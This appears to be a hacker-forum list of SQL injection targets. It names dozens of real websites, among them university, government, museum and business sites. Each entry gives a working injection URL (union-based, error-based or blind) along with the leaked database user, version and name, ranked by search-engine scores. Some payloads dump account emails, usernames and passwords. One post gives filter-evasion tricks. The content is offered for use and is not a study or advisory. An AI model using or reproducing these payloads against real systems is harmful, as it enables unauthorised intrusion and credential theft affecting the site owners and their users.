http://www.golfdm.co.uk/site/pages.php?fid=0,13&pp_id=38%20union%20select%201,2%20,3,group_concat%28acc_id,0x3a,acc_email,0x3a,pword%20%29,5%20from%20tblaccount--
Code: http://www.regula.ws/index.php?id=57&ml=ru and 1=1 [blind]
User: regula@localhost Version: 4.1.18-standard Database: db_regula
PR 5 TIC 30

Code: http://www.kolesa-spb.ru/tiresitems.php?id=308' and 1=1 and 'x'='x [blind]
User: [email protected] Version: 5.1.49-3-log Database: z96996_1
PR 2 TIC 30

Code: http://g10sms.com/see.php?id=4716 and 1=1 [blind]
User: [email protected] Version: 5.0.92-community Database: gsmscom_newsms
PR 4
Code: http://si.ras.ru/index.php?pid=%271%27and%28exists%28select%281%29from%28users%29w%20here%28ascii%28lower%28substring%28user_id,1,1%29%29%29%29like%2850%29%20%29%29and%271%27%3C%272%27
blind TIC 60 PR 5
TyumGU (Tyumen State University): scientific and methodological journal
Code: http://perspectives.[B]utmn.ru[/B]/?n=4&y=[COLOR=Red]-[/COLOR]2004[COLOR=Red]+union+select+1,2,3,4,5,6,7,group_concat%28table_name+separator+0x3a%29+from+information_schema.tables+where+table_schema=0x64625f313539[/COLOR]+--+
version: 5.5.12 database: db_159 user: dbu_159@localhost
+ PR: 4/10 | TIC: 20

TyumGU: Tests (.blind)
Code: http://tests.utmn.ru/tests.php?gr=72+and+substring(@@version,1,1)=5
P.S. Who will be the first to reach the supercomputer?

Municipal procurement server of the city of Tyumen
Code: http://mz.tyumen-city.ru/cgi-bin/konkurs.pl?action=invite&id=[COLOR=Red]-[/COLOR]1110024[COLOR=Red]+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3[/COLOR]+--+
version: 4.1.22 database: zakaz1 user: root@localhost
+ PR: 4/10 | TIC: 20
Code: http://www.zelfbouw-groenestroom.nl/redir.php?id=165 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: [email protected] Version: 5.0.91-log Database: DB5362771
PR 3

Code: http://www.dogsite.ws/web/r.php?ID=393.9 union all select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
User: [email protected] Version: 5.0.67 Database: ds
PR 2 TIC 70

Code: http://www.fursuit.co.uk/category.php?id=2 /*!30000and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/
User: fursuit_fursuit@localhost Version: 5.0.92-community Database: fursuit_links1
PR 3

Code: http://www.fellrunner.org.uk/races.php?id=' and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
User: fra@localhost Version: 5.1.54-1ubuntu4 Database: fra1
PR 4

Code: http://www.designdeck.co.uk/article_details.php?id=246 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: design_user@localhost Version: 5.0.92-community Database: design_db1
PR 3
Code: http://www.biochar.org.uk/abstract.php?id=37.9+union+all+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10+--+
User: [email protected] Version: 5.0.77 Database: biochar
PR 5

Code: http://core.materials.ac.uk/search/detail.php?id=2762 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: [email protected] Version: 5.1.45-community Database: core1
PR 5

Code: http://www.huhmagazine.co.uk/view_article.php?id=2215.9+union+all+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+
User: Jack@localhost Version: 5.0.86 Database: jacklowe_huh
PR 5
http://101vanna.ru/detail.php?id=110&pid=-543+and+1=2+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+-- 5.0.90
Code: http://www.underwatertimes.com/news.php?article_id=999999.9 union all select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7+--+
User: underw6_full@localhost Version: 5.0.92-community Database: underw6_762521
PR 5 TIC 20

Code: http://www.jpr.org.uk/publications/publication.php?id=138&sid=155 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: jpr@localhost Version: 5.1.50 Database: jpr31
PR 6 TIC 20

Code: http://www.healthgrid.org/news/index.php?id=32.9+union+all+select+1,concat_ws(0x3a,user(),version(),database()),3+--+
User: healthgrid@localhost Version: 5.0.51a-24+lenny5 Database: healthgrid_website
PR 6 TIC 10
Strangely, spaces and pluses stubbornly refused to work for me ... I solved the problem with "tuns" (тунсами), which can be replaced with pluses...
TIC 80, PR 4, Yandex Catalog, DMOZ
Output appears between => <=
HTML: http://www.hotels-in.ru/hotel.php?hid=999999.9+union+all+select+concat(0x3d3e,unhex(Hex(cast(database()+as+char))),0x3c3d)--

TIC 10, PR 2
HTML: http://aquatics.ru/accessory.php?aid=999999.9+union+all+select+1,concat(0x3a29203d3e,unhex(Hex(cast(database()+as+char))),0x3c3d20283a),NULL,NULL,NULL,NULL,NULL,NULL--

EASYHOMEPOKER
Maybe you'll find something
HTML: http://easyhomepoker.com/player.php?id=999999.9+union+all+select+1,2,concat(0x3d3e,database(),0x3c3d),NULL,NULL,NULL,NULL--
Code: http://shrs.iupui[SIZE=3][COLOR=RoyalBlue][B].edu[/B][/COLOR][/SIZE]/about/profile.php?emp_id=-22+union+select+1,concat(database(),char(59),version(),char(59), user())+--+ VERSION : 5.0.83 DATABASE : shrsweb USER : [email protected] PR - 5
Target: http://www.championsseriestennis.com/player.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,id,username,password
Host IP: 184.168.136.128
Web Server: Apache
DB Server: MySQL
Resp. Time(avg): 867 ms
Current User: [email protected]
Sql Version: 5.0.91-log
Current DB: gcaparulo2
System User: [email protected]
Host Name: p3nlhdb5007-07.shr.prod.phx3.secureserver.net
Installation dir: /usr/local/mysql-5.0.91-linux-x86_64-icc-glibc23/
DB User: 'gcaparulo2'@'%'
Data Bases: information_schema gcaparulo2
PR-5
PHP: http://www.al-mawrid.org/pages/research_detail.php?research_id=-5+union+select+1,concat(database(),char(59),version(),char(59),user()),3,4+--+
VERSION : 5.1.55 DATABASE : almaw0_mawrid USER : almaw0_naveed@localhost
PR - 5

PHP: http://www.fpl.fs.fed.us/research/highlights/view_research_highlight.php?research_id=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),char(59),version(),char(59),user()),10,11,12,13,14,15+--+
VERSION : 5.0.51a-3ubuntu5.5 DATABASE : forestproductslaboratorydb USER : root@localhost
PR - 6
Code: http://kinogallery.com/news/comments.php?id=9641 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: kinogaller_kino@localhost Version: 5.0.51a-community Database: kinogaller_kino1
PR 4 TIC 140
Code: http://club-edu.tambov.ru/main/methodic/index.php?id=40' and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
User: club@localhost Version: 5.1.30-log Database: club_methodic1
PR 5 TIC 2900

Code: http://www.desertmuseum.org/center/edu/pp_showclass.php?id=1580 and 1=1 [blind]
User: [email protected] Version: 4.0.18-log Database: asdmdata
PR 6 TIC 20

Code: http://www.manli.com/products/details.php?id=113.9 union all select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+
User: manlico_web@localhost Version: 5.0.92-community Database: manlico_web
PR 4 TIC 130
Campaign: an Internet without cr*p
http://www.webhostingcanada.com/faq/question.php?mode=read&question=-14+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13,14,15--+
labocadellobo.es PR-5
Code: http://www.labocadellobo.es/laboca/ficha.php?menu_id=1&jera_id=14&page_id=-75+/*!UnIoN*/+/*!SEleCT*/+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,concat_ws(0x3a,version(),user(),database()),17+--+
Code: 5.0.77:Boca2007@localhost:Boca2007

www.fam.ulusiada.pt PR-6 blind
Code: http://www.fam.ulusiada.pt/noticias/artigo.php?news_id=1217'+and+5=substring((select+version()),1,1)+--+ (no redirect)

theatreinchicago.com PR-5
Code: http://www.theatreinchicago.com/newswire.php?newsID=-215+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11+--+
Code: 4.0.27-standard:dbo141597383@localhost:db141597383